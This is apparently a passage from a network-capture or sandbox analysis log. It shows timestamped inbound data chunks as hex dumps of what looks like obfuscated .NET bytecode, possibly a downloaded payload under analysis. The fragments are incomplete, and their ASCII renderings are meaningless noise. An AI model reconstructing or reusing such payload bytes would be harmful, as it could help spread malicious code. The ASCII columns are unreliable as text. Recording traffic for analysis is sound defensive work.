00 fe 0c 0b 00 fe 0e 00 00 00 fe 0c 0a 00 20 01 00 00 00 3b ca 02 00 00 fe 0c 0b 00 fe 0e 00 00 fe 0c 0b Data Ascii: 8W((%~a Y ZX8( Y*0z% TF Z Z % P ;
2022-02-22 14:30:32 UTC 9 IN Data Raw: 00 00 00 00 20 02 00 00 00 8d 06 00 00 01 80 0d 00 00 04 7e 0d 00 00 04 20 00 00 00 00 fe 06 20 00 00 06 9b 7e 0d 00 00 04 20 01 00 00 00 fe 06 21 00 00 06 9b 2a 00 00 13 30 06 00 d9 04 00 00 12 00 00 11 fe 0d 0c 00 25 20 01 00 00 00 54 46 fe 0e 00 00 fe 0c 00 00 20 04 00 00 00 5a fe 0e 02 00 fe 0c 00 00 20 08 00 00 00 5a fe 0e 01 00 20 02 00 00 00 8d 01 00 00 01 fe 0e 03 00 20 02 00 00 00 8d 02 00 00 01 fe 0e 0b 00 20 02 00 00 00 8d 03 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 12 00 00 01 25 fe 0e 05 00 fe 0e 0f 00 20 02 00 00 00 8d 04 00 00 01 25 fe 0e 0d 00 fe 0e 04 00 20 02 00 00 00 8d 02 00 00 01 fe 0e 08 00 fe 0c 08 00 20 00 00 00 00 fe 09 01 00 a2 fe 0c 08 00 20 01 00 00 00 fe 09 00 00 a2 7f 51 00 00 04 fe 0e 06 00 fe 0c 06 00 fe 0e 11 00 fe 0c 11 00 Data Ascii: ~ ~ !*0% TF Z Z % % Q
2022-02-22 14:30:32 UTC 10 IN Data Raw: 01 00 00 00 8d 01 00 00 01 fe 0e 03 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 0b 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 03 00 00 01 25 fe 0e 05 00 fe 0e 0f 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 0d 00 fe 0e 04 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 08 00 fe 0c 08 00 20 00 00 00 00 fe 09 00 00 a2 7f 52 00 00 04 fe 0e 06 00 fe 0c 06 00 fe 0e 11 00 fe 0c 11 00 fe 0e 10 00 00 fe 0c 0a 00 20 01 00 00 00 3b ea 02 00 00 fe 0c 11 00 fe 0e 10 00 fe 0c 11 00 46 fe 0e 0e 00 fe 0c 11 00 20 01 00 00 00 58 fe 0e 11 00 fe 0c 0e 00 20 01 00 00 00 3f 1d 01 00 00 fe 0c 0e 00 20 07 00 00 00 3d 0f 01 00 00 20 04 00 00 00 fe 0c 0e 00 3f 8a 00 00 00 20 04 00 00 00 fe 0c 0e 00 3d 05 00 00 00 38 a1 01 00 00 20 02 00 00 00 fe 0c 0e 00 3f 3e 00 00 00 20 02 Data Ascii: % % R ;F X ? = ? =8 ?>
2022-02-22 14:30:32 UTC 12 IN Data Raw: 00 00 00 38 2b 00 00 00 20 07 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 07 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 42 01 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 a1 fe ff ff fe 0c 05 00 fe 0c 09 00 d0 05 00 00 02 8c 13 00 00 01 a2 fe 0c 0d 00 fe 0c 09 00 20 04 00 00 00 9c fe 0c 09 00 20 01 00 00 00 58 fe 0e 09 00 38 6d fe ff ff fe 0c 0d 00 fe 0c 09 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 9a a5 13 00 00 01 7e 10 00 00 04 fe 0c 0c 00 fe 0c 02 00 58 4a 97 29 18 00 00 11 a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 0e fe ff ff fe 0c 08 00 fe 0c 0c 00 fe 0c 02 00 58 4a fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 9a a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 fe 0c 09 00 20 01 Data Ascii: 8+ ? =8B888 X8m Y Y Y~XJ) X8XJ Y X
2022-02-22 14:30:32 UTC 13 IN Data Raw: 01 00 fe 0c 01 00 39 13 00 00 00 28 01 00 00 2b fe 0e 00 00 38 14 00 00 00 38 0e 00 00 00 00 fe 09 00 00 fe 0e 00 00 38 01 00 00 00 00 fe 0c 00 00 2a 00 00 00 13 30 02 00 1a 00 00 00 1c 00 00 11 00 fe 09 01 00 fe 0d 00 00 fe 15 05 00 00 1b fe 0c 00 00 81 05 00 00 1b 00 2a 00 00 13 30 05 00 4e 02 00 00 1d 00 00 11 fe 0d 0f 00 25 20 01 00 00 00 54 46 fe 0e 03 00 fe 0c 03 00 20 04 00 00 00 5a fe 0e 0b 00 fe 0c 03 00 20 08 00 00 00 5a fe 0e 05 00 20 01 00 00 00 8d 01 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 01 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 0d 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 06 00 fe 0e 0e 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 02 00 fe 0c 02 00 20 00 00 00 00 fe 09 00 00 a2 7f 55 00 00 04 fe 0e 09 00 fe 0c 09 00 fe 0e 04 00 Data Ascii: 9(+888*0*0N% TF Z Z % U
2022-02-22 14:30:32 UTC 14 IN Data Raw: 00 fe 0c 0b 00 fe 0e 01 00 fe 0c 0b 00 46 fe 0e 09 00 fe 0c 0b 00 20 01 00 00 00 58 fe 0e 0b 00 fe 0c 09 00 20 01 00 00 00 3f ab 00 00 00 fe 0c 09 00 20 04 00 00 00 3d 9d 00 00 00 20 02 00 00 00 fe 0c 09 00 3f 3e 00 00 00 20 02 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 83 00 00 00 20 01 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 5c 00 00 00 38 56 00 00 00 38 51 00 00 00 20 03 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 03 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 7e 00 00 00 38 2b 00 00 00 20 04 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 a2 00 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 13 ff ff ff fe 0c 06 00 fe 0c 0c 00 fe 0c 0e 00 fe 0c 0b 00 fe 0c 00 00 58 4a 9a a2 fe 0c 08 00 fe 0c 0c Data Ascii: F X ? = ?> =8 ? =8\8V8Q ? =8~8+ ? =8888XJ
2022-02-22 14:30:32 UTC 16 IN Data Raw: 00 3f 18 00 00 00 20 10 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 51 0d 00 00 38 65 01 00 00 38 60 01 00 00 20 13 00 00 00 fe 0c 27 00 3f 3e 00 00 00 20 13 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 23 0e 00 00 20 12 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 12 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 a1 0d 00 00 38 19 01 00 00 38 14 01 00 00 20 14 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 14 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 1f 0e 00 00 38 ee 00 00 00 38 e9 00 00 00 20 18 00 00 00 fe 0c 27 00 3f 64 00 00 00 20 18 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 df 16 00 00 20 16 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 16 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 a0 0e 00 00 38 a2 00 00 00 20 17 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 17 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 c4 Data Ascii: ? '=8Q8e8` '?> '=8# '? '=888 '? '=888 '?d '=8 '? '=88 '? '=8
2022-02-22 14:30:32 UTC 17 IN Data Raw: 0c 0a 00 fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a 9a a2 fe 0c 15 00 fe 0c 0a 00 20 05 00 00 00 9c fe 0c 0a 00 20 01 00 00 00 58 fe 0e 0a 00 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd 98 f7 ff ff fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 9a 74 09 00 00 1b 7e 15 00 00 04 fe 0c 21 00 fe 0c 18 00 58 4a 97 29 22 00 00 11 a2 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd 39 f7 ff ff fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 9a a2 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0e 0a 00 dd fa f6 ff ff fe 0c 19 00 fe 0c 21 00 fe 0c 18 00 58 4a 58 fe 0e 21 00 dd e2 f6 ff ff fe 0c 15 00 fe 0c 0a Data Ascii: !XJ X! X! Y Y Yt~!XJ)"! X!9!XJ Y! X! Y!XJX!
2022-02-22 14:30:32 UTC 18 IN Data Raw: fe 0c 13 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 24 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 fe 0c 26 00 fe 0c 24 00 fe 0c 1f 00 58 3c 16 00 00 00 fe 0c 24 00 fe 0c 26 00 3d 1c 00 00 00 fe 0c 0d 00 38 26 00 00 00 fe 0c 0d 00 20 01 00 00 00 58 fe 0e 23 00 38 6e ff ff ff fe 0c 0d 00 20 01 00 00 00 59 fe 0e 13 00 38 5b ff ff ff 00 fe 0e 25 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 25 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 0e 00 fe 0c 0e 00 fe 0c 1d 00 3b bd 00 00 00 fe 0c 19 00 fe 0c 1d 00 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 0e 00 fe 0c 0e 00 20 ff ff ff ff 3b 78 00 00 00 Data Ascii: X [ XX ZXXJ$ XX ZX XXJ&$X<$&=8& X#8n Y8[% XX% ZX XXJ;X XXJ ;x
2022-02-22 14:30:32 UTC 20 IN Data Raw: 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 00 00 00 00 9c fe 0c 12 00 fe 0c 0a 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd 39 f1 ff ff 00 fe 0c 11 00 fe 0c 19 00 59 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 23 00 fe 0c 0b 00 fe 0c 13 00 fe 0c 23 00 58 3c 16 00 00 00 fe 0c 13 00 fe 0c 0b 00 3d 1c 00 00 00 fe 0c 0d 00 38 26 00 00 00 fe 0c 0d 00 20 01 00 00 00 58 fe 0e 1f 00 38 6e ff ff ff fe 0c 0d 00 20 01 00 00 00 59 fe 0e 24 Data Ascii: Y @0 T9Y $$X [ XX ZXXJ XX ZX XXJ##X<=8& X8n Y$
2022-02-22 14:30:32 UTC 21 IN Data Raw: 13 00 38 5b ff ff ff 00 fe 0e 26 00 fe 0c 19 00 20 a0 01 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 16 00 fe 0c 16 00 fe 0c 17 00 fe 0c 14 00 94 40 e8 fe ff ff fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 00 fe 0c 1d 00 fe 0e 05 00 00 fe 0c 05 00 20 ff ff ff ff 3b b4 01 00 00 00 fe 0c 0e 00 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 23 00 fe 0c 0b 00 fe 0c 13 00 fe 0c 23 00 58 3c 16 00 00 00 fe 0c 13 00 fe 0c 0b 00 3d 1c 00 00 00 fe 0c 0d 00 38 Data Ascii: 8[& X& ZX XXJ@ X ; $$X [ XX ZXXJ XX ZX XXJ##X<=8
2022-02-22 14:30:32 UTC 22 IN Data Raw: 00 fe 0c 0e 00 20 01 00 00 00 3b b0 00 00 00 fe 0c 0e 00 20 02 00 00 00 3b 45 01 00 00 fe 0c 19 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 1b 00 a2 fe 0c 19 00 fe 0c 19 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 18 00 58 4a 58 fe 0e 21 00 fe 0c 22 00 fe 0c 14 00 fe 0c 1b 00 a2 fe 0c 17 00 fe 0c 14 00 fe 0c 16 00 9e fe 0c 06 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 19 00 fe 0c 16 00 58 20 20 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 Data Ascii: ; ;EX XXJ Y YX XXJX!" X8.X XXJ Y
2022-02-22 14:30:32 UTC 24 IN Data Raw: 0c 27 00 3f d6 00 00 00 20 13 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 97 0e 00 00 20 10 00 00 00 fe 0c 27 00 3f 64 00 00 00 20 10 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 a6 09 00 00 20 0e 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 0e 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 b8 08 00 00 38 65 01 00 00 20 0f 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 0f 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 ee 08 00 00 38 3f 01 00 00 38 3a 01 00 00 20 11 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 11 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 78 0d 00 00 38 14 01 00 00 20 12 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 12 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 7d 0d 00 00 38 ee 00 00 00 38 e9 00 00 00 20 16 00 00 00 fe 0c 27 00 3f 64 00 00 00 20 16 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 c8 0e 00 00 Data Ascii: '? '=8 '?d '=8 '? '=88e '? '=88?8: '? '=8x8 '? '=8}88 '?d '=8
2022-02-22 14:30:32 UTC 25 IN Data Raw: 00 9e fe 0c 06 00 fe 0c 14 00 20 00 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 0f 00 00 00 00 20 01 00 00 00 fe 0e 0f 00 fe 0c 20 00 7a 00 00 dd 31 f8 ff ff 00 dd 2b f8 ff ff fe 0c 10 00 fe 0c 0a 00 fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a 9a a2 fe 0c 15 00 fe 0c 0a 00 20 05 00 00 00 9c fe 0c 0a 00 20 01 00 00 00 58 fe 0e 0a 00 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd e4 f7 ff ff fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 9a 74 09 00 00 1b 7e 16 00 00 04 fe 0c 21 00 fe 0c 18 00 58 4a 97 29 22 00 00 11 a2 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd 85 f7 ff ff fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a fe 0c 10 00 fe 0c 0a 00 20 01 00 00 Data Ascii: X8 z1+!XJ X! X! Y Y Yt~!XJ)"! X!!XJ
2022-02-22 14:30:32 UTC 26 IN Data Raw: 00 20 01 00 00 00 59 fe 0e 24 00 38 5b ff ff ff 00 fe 0e 1d 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 1d 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 16 00 fe 0c 16 00 fe 0e 05 00 20 ff ff ff ff fe 0c 07 00 3b 1e 03 00 00 fe 0c 11 00 fe 0c 07 00 3b ff 02 00 00 fe 0c 07 00 fe 0c 19 00 59 fe 0e 16 00 00 fe 0c 14 00 20 00 00 00 00 3b 17 01 00 00 fe 0c 14 00 20 01 00 00 00 59 fe 0e 14 00 fe 0c 16 00 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 87 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 87 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 23 00 fe 0c 0b 00 fe 0c 13 Data Ascii: Y$8[ ?X ZX XXJ ;;Y ; Y $$X [ X ZXXJ X ZX XXJ#
2022-02-22 14:30:32 UTC 28 IN Data Raw: 00 dd b2 ed ff ff 20 00 00 00 00 fe 0e 0a 00 fe 0c 14 00 20 01 00 00 00 59 fe 0e 14 00 fe 0c 22 00 fe 0c 14 00 9a fe 0e 20 00 fe 0c 20 00 14 3b 4f 04 00 00 fe 0c 14 00 20 00 00 00 00 3b 49 00 00 00 fe 0c 06 00 fe 0c 14 00 20 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 00 00 00 00 9c fe 0c 12 00 fe 0c 0a 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd 32 f1 ff ff 00 fe 0c 11 00 fe 0c 19 00 59 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe Data Ascii: Y" ;O ;I Y @0 T2Y $$X [ ?X ZXXJ ?X ZX XXJ
2022-02-22 14:30:32 UTC 29 IN Data Raw: fe 0e 1f 00 fe 0c 25 00 fe 0c 24 00 fe 0c 1f 00 58 3c 16 00 00 00 fe 0c 24 00 fe 0c 25 00 3d 1c 00 00 00 fe 0c 0d 00 38 26 00 00 00 fe 0c 0d 00 20 01 00 00 00 58 fe 0e 23 00 38 6e ff ff ff fe 0c 0d 00 20 01 00 00 00 59 fe 0e 13 00 38 5b ff ff ff 00 fe 0e 26 00 fe 0c 19 00 20 87 01 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 16 00 fe 0c 16 00 fe 0c 17 00 fe 0c 14 00 94 40 e8 fe ff ff fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 00 fe 0c 1d 00 fe 0e 05 00 00 fe 0c 05 00 20 ff ff ff ff 3b b4 01 00 00 00 fe 0c 0e 00 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e Data Ascii: %$X<$%=8& X#8n Y8[& X& ZX XXJ@ X ; $$X [ ?X ZXXJ
2022-02-22 14:30:32 UTC 30 IN Data Raw: fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 1b 00 a2 fe 0c 19 00 fe 0c 19 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 18 00 58 4a 58 fe 0e 21 00 fe 0c 22 00 fe 0c 14 00 fe 0c 1b 00 a2 fe 0c 17 00 fe 0c 14 00 fe 0c 16 00 9e fe 0c 06 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 19 00 fe 0c 16 00 58 20 20 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 1b 00 a2 fe 0c 19 00 fe 0c 19 00 fe 0c 16 00 58 20 20 00 00 00 58 fe 0c 18 00 58 4a 58 fe 0e 21 00 fe 0c 22 00 fe 0c 14 00 fe 0c 1b 00 a2 fe 0c 17 00 fe 0c Data Ascii: Y YX XXJX!" X8.X XXJ Y YX XXJX!"
2022-02-22 14:30:32 UTC 32 IN Data Raw: 08 00 00 38 2d 03 00 00 38 28 03 00 00 20 0b 00 00 00 fe 0c 17 00 3f 8a 00 00 00 20 0b 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 48 09 00 00 20 09 00 00 00 fe 0c 17 00 3f 3e 00 00 00 20 09 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 99 08 00 00 20 08 00 00 00 fe 0c 17 00 3f 18 00 00 00 20 08 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 39 08 00 00 38 c0 02 00 00 38 bb 02 00 00 20 0a 00 00 00 fe 0c 17 00 3f 18 00 00 00 20 0a 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 94 08 00 00 38 95 02 00 00 38 90 02 00 00 20 0d 00 00 00 fe 0c 17 00 3f 3e 00 00 00 20 0d 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 90 09 00 00 20 0c 00 00 00 fe 0c 17 00 3f 18 00 00 00 20 0c 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 10 09 00 00 38 49 02 00 00 38 44 02 00 00 20 0e 00 00 00 fe 0c 17 00 3f 18 00 00 00 Data Ascii: 8-8( ? =8H ?> =8 ? =8988 ? =888 ?> =8 ? =88I8D ?
2022-02-22 14:30:32 UTC 33 IN Data Raw: 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 20 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 20 00 9e fe 0c 27 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 00 00 fe 0c 20 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a fe 0e 18 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 20 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 20 00 9e fe 0c 27 00 fe 0c 14 00 20 01 00 Data Ascii: Y X XXJX ' X8. X XXJ Y Y X XXJX '
2022-02-22 14:30:32 UTC 34 IN Data Raw: 0c 08 00 fe 0c 00 00 59 fe 0e 0e 00 20 00 00 00 00 fe 0e 20 00 20 02 00 00 00 fe 0e 18 00 fe 0c 20 00 fe 0c 18 00 58 20 02 00 00 00 5b fe 0e 25 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 25 00 20 18 00 00 00 5a 58 fe 0c 16 00 58 4a fe 0e 22 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 25 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 1a 00 fe 0c 0e 00 fe 0c 22 00 fe 0c 1a 00 58 3c 16 00 00 00 fe 0c 22 00 fe 0c 0e 00 3d 1c 00 00 00 fe 0c 25 00 38 26 00 00 00 fe 0c 25 00 20 01 00 00 00 58 fe 0e 20 00 38 6e ff ff ff fe 0c 25 00 20 01 00 00 00 59 fe 0e 18 00 38 5b ff ff ff 00 fe 0e 12 00 fe 0c 00 00 20 6a 01 00 00 58 fe 0c 12 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 09 00 fe 0c 09 00 fe 0e 19 00 20 ff ff ff ff fe 0c 04 00 3b Data Ascii: Y X [% jX% ZXXJ" jX% ZX XXJ"X<"=%8&% X 8n% Y8[ jX ZX XXJ ;
2022-02-22 14:30:32 UTC 36 IN Data Raw: 5a fe 0c 1e 00 fe 0c 16 00 58 4a fe 0c 1e 00 20 08 00 00 00 58 fe 0c 16 00 58 4a 59 5a fe 0c 1e 00 20 08 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0c 00 00 58 fe 0e 1e 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0e 1b 00 dd 44 ee ff ff fe 0c 05 00 fe 0c 1b 00 14 a2 fe 0c 10 00 fe 0c 1b 00 20 05 00 00 00 9c fe 0c 1b 00 20 01 00 00 00 58 fe 0e 1b 00 dd 19 ee ff ff fe 0c 02 00 fe 0c 1b 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 05 00 fe 0c 1b 00 20 02 00 00 00 59 9a 74 0a 00 00 1b fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 9a fe 01 54 fe 0c 10 00 fe 0c 1b 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 1b 00 20 01 00 00 00 59 fe 0e 1b 00 dd b8 ed ff ff fe 0c 02 00 fe 0c 1b 00 8f 04 00 00 01 e0 fe 0c 1e 00 fe 0c 16 00 58 4a 54 fe 0c 10 00 fe 0c 1b 00 20 00 00 00 00 9c fe 0c Data Ascii: ZXJ XXJYZ XXJXX YD X Y Yt YT Y YXJT
2022-02-22 14:30:32 UTC 37 IN Data Raw: 0c 1a 00 9e fe 0c 27 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0f 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 20 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 1a 00 9e fe 0c 27 00 fe 0c 14 00 20 01 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 8b 00 00 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0f 00 20 00 00 00 00 fe 0e 1b 00 fe 0c 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe Data Ascii: ' X8.X XXJ Y YX XXJX' X8X XXJ X X
